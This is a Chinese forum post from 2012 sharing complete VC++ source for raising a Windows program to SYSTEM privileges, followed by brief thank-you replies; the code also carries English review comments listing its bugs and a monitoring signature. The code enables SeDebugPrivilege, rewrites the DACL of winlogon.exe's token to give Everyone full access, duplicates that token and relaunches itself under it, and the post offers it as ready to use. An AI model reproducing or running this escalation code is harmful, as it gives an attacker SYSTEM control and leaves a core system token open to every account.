[分享] VC++ 提升自身权限为system

    发表于 2012-4-16 12:49:18 | 显示全部楼层 |阅读模式
    #include "stdafx.h"
    #include <windows.h>
    #include <tlhelp32.h>
    #include <Psapi.h>
    #pragma comment(lib,"Psapi.lib")
    #include "Shellapi.h"
    #include <TLHELP32.H>
    #include <aclapi.h>

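    /*
     * ProcessExit: report whether a running process matches szProcName.
     *
     * szProcName  name to look for (compared case-insensitively with lstrcmpi).
     * x           non-zero: compare against the short image name
     *             (PROCESSENTRY32.szExeFile).
     *             zero: compare against the full module path returned by
     *             GetModuleFileNameEx for each process that can be opened.
     *
     * Returns TRUE (1) when a match is found, FALSE (0) otherwise - including
     * when the process snapshot cannot be taken.
     *
     * Fixes over the earlier version: CreateToolhelp32Snapshot signals failure
     * with INVALID_HANDLE_VALUE (not NULL), the process handle is now closed on
     * the match path as well, CloseHandle is no longer called on a NULL handle,
     * the path buffer is reset per iteration so a failed GetModuleFileNameEx
     * cannot reuse the previous process's path, and the two Sleep(1) calls,
     * which had no effect on the result, are gone.
     */
    int ProcessExit(LPCTSTR szProcName, int x)
    {
    PROCESSENTRY32 pe;
    BOOL bFound = FALSE;
    char fileName[1024];

    HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSP == INVALID_HANDLE_VALUE)
    {
      return FALSE;
    }

    pe.dwSize = sizeof(pe);
    for (BOOL bMore = Process32First(hSP, &pe); bMore; bMore = Process32Next(hSP, &pe))
    {
      if (x)
      {
       if (lstrcmpi(szProcName, pe.szExeFile) == 0)
       {
        bFound = TRUE;
        break;
       }
       continue;
      }

      HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe.th32ProcessID);
      if (hProcess == NULL)
      {
       /* Cannot query this process (access denied or already gone): not a match. */
       continue;
      }

      /* Empty the buffer first so a failed query cannot match a stale path. */
      fileName[0] = '\0';
      if (GetModuleFileNameEx(hProcess, NULL, (LPSTR)fileName, sizeof(fileName)) != 0 &&
       lstrcmpi(szProcName, fileName) == 0)
      {
       bFound = TRUE;
      }

      /* Closed on every path, including the match, to avoid a handle leak. */
      CloseHandle(hProcess);
      if (bFound)
      {
       break;
      }
    }

    CloseHandle(hSP);
    return bFound;
    }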

    /* Function-pointer type matching the CreateMutexA signature. Nothing in the
       functions visible in this listing uses it. */
    typedef HANDLE (WINAPI *CreateMutexAT)

    (
    __in_opt LPSECURITY_ATTRIBUTES lpMutexAttributes,
    __in     BOOL bInitialOwner,
    __in_opt LPCSTR lpName
    );


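    /*
     * EnableDebugPriv: enable the named privilege (e.g. "SeDebugPrivilege") in
     * the current process's access token.
     *
     * szPrivilege  privilege name as accepted by LookupPrivilegeValue.
     *
     * Returns TRUE when the privilege is enabled on return. Returns FALSE when
     * the token cannot be opened, the name is unknown, AdjustTokenPrivileges
     * fails, or the token does not hold the privilege at all. That last case
     * matters: AdjustTokenPrivileges returns TRUE even when it could enable
     * nothing and only reports ERROR_NOT_ALL_ASSIGNED through GetLastError,
     * so the earlier version could report success for a privilege it did not
     * actually enable. The token handle is now closed on every path; before it
     * leaked on the success path.
     */
    BOOL
    EnableDebugPriv( LPCTSTR szPrivilege )
    {
    HANDLE hToken = NULL;
    LUID luid;
    TOKEN_PRIVILEGES tkp;
    BOOL bEnabled = FALSE;

    if ( !OpenProcessToken( GetCurrentProcess(),
      TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
      &hToken ) )
    {
      return FALSE;
    }

    if ( LookupPrivilegeValue( NULL, szPrivilege, &luid ) )
    {
      tkp.PrivilegeCount = 1;
      tkp.Privileges[0].Luid = luid;
      tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

      /* A TRUE return is not sufficient on its own - see the header comment. */
      if ( AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) &&
       GetLastError() != ERROR_NOT_ALL_ASSIGNED )
      {
       bEnabled = TRUE;
      }
    }

    CloseHandle( hToken );
    return bEnabled;
    }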


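    /*
     * GetProcessId: return the id of the first running process whose image
     * name (PROCESSENTRY32.szExeFile) equals szProcName, case-insensitively.
     *
     * Returns the process id, or 0 when no process matches or the snapshot
     * cannot be taken. The earlier version returned NULL from a DWORD function
     * and left dwPid uninitialised; it also tested the snapshot handle against
     * NULL, although CreateToolhelp32Snapshot reports failure with
     * INVALID_HANDLE_VALUE.
     *
     * NOTE(review): the name collides with the Win32 API GetProcessId(HANDLE)
     * declared by newer SDK headers. It is kept because CreateSystemProcess
     * calls it under this name.
     */
    DWORD
    GetProcessId( LPCTSTR szProcName )
    {
    PROCESSENTRY32 pe;
    DWORD dwPid = 0;

    /* Enumerate processes through the ToolHelp32 snapshot API. */
    HANDLE hSP = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if ( hSP == INVALID_HANDLE_VALUE )
    {
      return 0;
    }

    pe.dwSize = sizeof( pe );
    for ( BOOL bMore = Process32First( hSP, &pe ); bMore; bMore = Process32Next( hSP, &pe ) )
    {
      /* lstrcmpi ignores case, so "WINLOGON.EXE" also matches "winlogon.exe". */
      if ( lstrcmpi( szProcName, pe.szExeFile ) == 0 )
      {
       dwPid = pe.th32ProcessID;
       break;
      }
    }

    CloseHandle( hSP );
    return dwPid;
    }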


    /*
     * CreateSystemProcess: start szProcessName under a duplicate of the
     * WINLOGON.EXE primary token.
     *
     * The visible sequence: enable SeDebugPrivilege, find WINLOGON.EXE by
     * image name, open its token with READ_CONTROL | WRITE_DAC, rewrite the
     * token's DACL so that "Everyone" is granted TOKEN_ALL_ACCESS, reopen the
     * token with TOKEN_ALL_ACCESS, duplicate it as a primary token,
     * impersonate it and call CreateProcessAsUser with szProcessName as the
     * command line.
     *
     * szProcessName  writable command line handed to CreateProcessAsUser.
     * Returns TRUE only if every step succeeded, FALSE otherwise.
     *
     * NOTE(review): defects in this block, left as they are here:
     *  - hProcess, hToken, hNewToken and pi are never initialised, yet the
     *    Cleanup label calls CloseHandle on all of them, so any early
     *    "goto Cleanup" closes indeterminate handle values.
     *  - the second OpenProcessToken overwrites hToken; the first token handle
     *    is never closed.
     *  - pNewDAcl is allocated by SetEntriesInAcl and never freed.
     *  - the ImpersonateLoggedOnUser result is ignored and there is no
     *    RevertToSelf, so the calling thread keeps the impersonation after
     *    this function returns.
     *  - the DACL written to the winlogon token is not restored on either the
     *    success or the failure path.
     * For monitoring purposes, the observable sequence is an SeDebugPrivilege
     * enable followed by a WRITE_DAC open and DACL rewrite of another
     * process's token and a CreateProcessAsUser call.
     */
    BOOL CreateSystemProcess( LPTSTR szProcessName )
    {
    HANDLE hProcess;
    HANDLE hToken, hNewToken;
    DWORD dwPid;

    PACL pOldDAcl = NULL;
    PACL pNewDAcl = NULL;
    BOOL bDAcl;
    BOOL bDefDAcl;
    DWORD dwRet;

    PACL pSacl = NULL;
    PSID pSidOwner = NULL;
    PSID pSidPrimary = NULL;
    DWORD dwAclSize = 0;
    DWORD dwSaclSize = 0;
    DWORD dwSidOwnLen = 0;
    DWORD dwSidPrimLen = 0;

    DWORD dwSDLen;
    EXPLICIT_ACCESS ea;
    PSECURITY_DESCRIPTOR pOrigSd = NULL;
    PSECURITY_DESCRIPTOR pNewSd = NULL;

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    BOOL bError;

    /* Without this privilege the later OpenProcess on winlogon presumably fails. */
    if (!EnableDebugPriv("SeDebugPrivilege"))
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* Matched by image name only; GetProcessId returns 0/NULL when not found. */
    if ( ( dwPid = GetProcessId("WINLOGON.EXE") ) == NULL )
    {
      bError = TRUE;
      goto Cleanup;
    }

    hProcess = OpenProcess( MAXIMUM_ALLOWED, FALSE, dwPid );
    if ( hProcess == NULL )
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* WRITE_DAC is all that is needed to change the token's own DACL below. */
    if ( !OpenProcessToken( hProcess, READ_CONTROL | WRITE_DAC, &hToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* The ACE that will be merged into the token's DACL: Everyone, full access. */
    ZeroMemory( &ea, sizeof( EXPLICIT_ACCESS ) );
    BuildExplicitAccessWithName( &ea,
      "Everyone",
      TOKEN_ALL_ACCESS,
      GRANT_ACCESS,
      0 );

    /* First call with a zero-length buffer only to learn the required size. */
    if ( !GetKernelObjectSecurity( hToken,
      DACL_SECURITY_INFORMATION,
      pOrigSd,
      0,
      &dwSDLen ) )
    {
      
      if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
      {
       pOrigSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSDLen );
       if ( pOrigSd == NULL )
       {
        bError = TRUE;
        goto Cleanup;
       }
       
       /* Second call fetches the self-relative descriptor into pOrigSd. */
       if ( !GetKernelObjectSecurity( hToken,
        DACL_SECURITY_INFORMATION,
        pOrigSd,
        dwSDLen,
        &dwSDLen ) )
       {
        bError = TRUE;
        goto Cleanup;
       }
      }
      else
      {
       bError = TRUE;
       goto Cleanup;
      }
    }

    /* pOldDAcl points into pOrigSd here; it is reassigned to a heap copy later. */
    if ( !GetSecurityDescriptorDacl( pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl ) )
    {
      bError = TRUE;
      goto Cleanup;
    }


    /* Merge the Everyone ACE into the existing DACL; pNewDAcl is LocalAlloc'd
       by the API and is not released anywhere in this function. */
    dwRet = SetEntriesInAcl( 1, &ea, pOldDAcl, &pNewDAcl );
    if ( dwRet != ERROR_SUCCESS )
    {
      pNewDAcl = NULL;
      
      bError = TRUE;
      goto Cleanup;
    }

    /* First MakeAbsoluteSD call with NULL/zero buffers just reports the sizes. */
    if ( !MakeAbsoluteSD( pOrigSd,
      pNewSd,
      &dwSDLen,
      pOldDAcl,
      &dwAclSize,
      pSacl,
      &dwSaclSize,
      pSidOwner,
      &dwSidOwnLen,
      pSidPrimary,
      &dwSidPrimLen ) )
    {
      
      if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
      {
       pOldDAcl = ( PACL ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwAclSize );
       pSacl = ( PACL ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSaclSize );
       pSidOwner = ( PSID ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSidOwnLen );
       pSidPrimary = ( PSID ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSidPrimLen );
       pNewSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSDLen );
       
       if ( pOldDAcl == NULL ||
        pSacl == NULL ||
        pSidOwner == NULL ||
        pSidPrimary == NULL ||
        pNewSd == NULL )
       {
        bError = TRUE;
        goto Cleanup;
       }
       
       //
       // Only this second call builds the new absolute descriptor pNewSd,
       // but it still carries the original DACL at this point.
       //
       if ( !MakeAbsoluteSD( pOrigSd,
        pNewSd,
        &dwSDLen,
        pOldDAcl,
        &dwAclSize,
        pSacl,
        &dwSaclSize,
        pSidOwner,
        &dwSidOwnLen,
        pSidPrimary,
        &dwSidPrimLen ) )
       {
        bError = TRUE;
        goto Cleanup;
       }
      }
      else
      {
       bError = TRUE;
       goto Cleanup;
      }
    }

    /* Swap the merged DACL into the absolute descriptor ... */
    if ( !SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* ... and write it back onto the token. Nothing below restores the old DACL. */
    if ( !SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* Reopen with full access now that the DACL allows it; overwrites hToken,
       so the READ_CONTROL | WRITE_DAC handle opened earlier is leaked. */
    if ( !OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    /* A primary token is required by CreateProcessAsUser. */
    if ( !DuplicateTokenEx( hToken,
      TOKEN_ALL_ACCESS,
      NULL,
      SecurityImpersonation,
      TokenPrimary,
      &hNewToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }


    ZeroMemory( &si, sizeof( STARTUPINFO ) );
    si.cb = sizeof( STARTUPINFO );

    /* Return value ignored; no matching RevertToSelf anywhere in this function. */
    ImpersonateLoggedOnUser( hNewToken );

    if ( !CreateProcessAsUser( hNewToken,
      NULL,
      szProcessName,
      NULL,
      NULL,
      FALSE,
      NULL, //NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
      NULL,
      NULL,
      &si,
      &pi ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    bError = FALSE;

    /* Every early exit lands here; see the header comment about the handles
       that may still be uninitialised at this point. */
    Cleanup:
    if ( pOrigSd )
    {
      HeapFree( GetProcessHeap(), 0, pOrigSd );
    }
    if ( pNewSd )
    {
      HeapFree( GetProcessHeap(), 0, pNewSd );
    }
    if ( pSidPrimary )
    {
      HeapFree( GetProcessHeap(), 0, pSidPrimary );
    }
    if ( pSidOwner )
    {
      HeapFree( GetProcessHeap(), 0, pSidOwner );
    }
    if ( pSacl )
    {
      HeapFree( GetProcessHeap(), 0, pSacl );
    }
    if ( pOldDAcl )
    {
      HeapFree( GetProcessHeap(), 0, pOldDAcl );
    }

    CloseHandle( pi.hProcess );
    CloseHandle( pi.hThread );
    CloseHandle( hToken );
    CloseHandle( hNewToken );
    CloseHandle( hProcess );

    if ( bError )
    {
      return FALSE;
    }

    return TRUE;
    }





    /*
     * WinMain: program entry point. Reads this executable's own path and
     * passes it to CreateSystemProcess, so a successful call starts another
     * copy of this same program under the winlogon token. That copy runs
     * WinMain again, so as far as the visible code shows each successful
     * generation spawns the next; nothing here stops the chain.
     *
     * The return values of GetModuleFileName (truncation is not detectable
     * without it) and of CreateSystemProcess are both ignored, and the
     * command-line arguments are unused.
     */
    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPSTR     lpCmdLine,
                         int       nCmdShow)
    {



    char strInstallModule[MAX_PATH];
    memset(strInstallModule, 0, sizeof(strInstallModule));
    GetModuleFileName(NULL,strInstallModule,sizeof(strInstallModule));

    CreateSystemProcess(strInstallModule);
      /* Presumably gives the child process a moment before this instance exits. */
      Sleep(1000);
      return 0;
    }



    以上是提升自身权限为system

    完整代码 可以提升自己为system
    发表于 2012-9-9 21:12:50 | 显示全部楼层
    想钱钱的疯子!!!
    发表于 2013-7-9 17:41:08 | 显示全部楼层
    多谢分享!
    发表于 2013-11-27 18:09:56 | 显示全部楼层
    谢谢分享!